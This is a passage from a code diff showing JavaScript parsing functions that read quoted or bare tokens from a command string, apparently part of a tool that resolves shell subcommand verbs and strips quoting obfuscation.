|
+
let j = i + 1;
|
|
292
|
+
let buf = '';
|
|
293
|
+
while (j < input.length) {
|
|
294
|
+
const c = input[j];
|
|
295
|
+
if (c === '\\' && q === '"' && j + 1 < input.length) {
|
|
296
|
+
buf += input[j + 1];
|
|
297
|
+
j += 2;
|
|
298
|
+
continue;
|
|
299
|
+
}
|
|
300
|
+
if (c === q)
|
|
301
|
+
return buf;
|
|
302
|
+
buf += c;
|
|
303
|
+
j++;
|
|
304
|
+
}
|
|
305
|
+
return null;
|
|
306
|
+
}
|
|
307
|
+
// Bare token — read up to whitespace
|
|
308
|
+
let j = i;
|
|
309
|
+
while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
|
|
310
|
+
j++;
|
|
311
|
+
return input.slice(i, j);
|
|
312
|
+
}
|
|
104
313
|
/**
|
|
105
314
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
106
315
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|